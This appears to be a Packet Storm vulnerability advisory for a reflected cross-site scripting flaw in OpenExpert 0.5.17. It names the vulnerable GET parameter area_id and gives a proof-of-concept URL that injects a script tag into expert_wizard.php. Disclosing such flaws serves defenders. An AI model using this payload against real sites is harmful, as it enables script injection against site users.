OpenExpert version 0.5.17 suffers from a cross site scripting vulnerability.
02ec59b09dcd5db63f93ca101026b138aebc522b67e869be3b43b4ded4f6f42b# Title : Openexpert 0.5.17 - Cross Site Scripting
# Author: Nassim Asrir
# Author Company: Henceforth
# Tested on: Winxp sp3 - win7
# Vendor: https://sourceforge.net/projects/law-expert/
# Download Software: https://sourceforge.net/projects/law-expert/files/
#################################################
## About The Product : ##
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.
## Vulnerability : ##
- Vulnerable Parametre : area_id
- HTTP Method : GET
- To exploit it : http://HOST/expert_wizard.php?area_id="><script>alert(1);</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed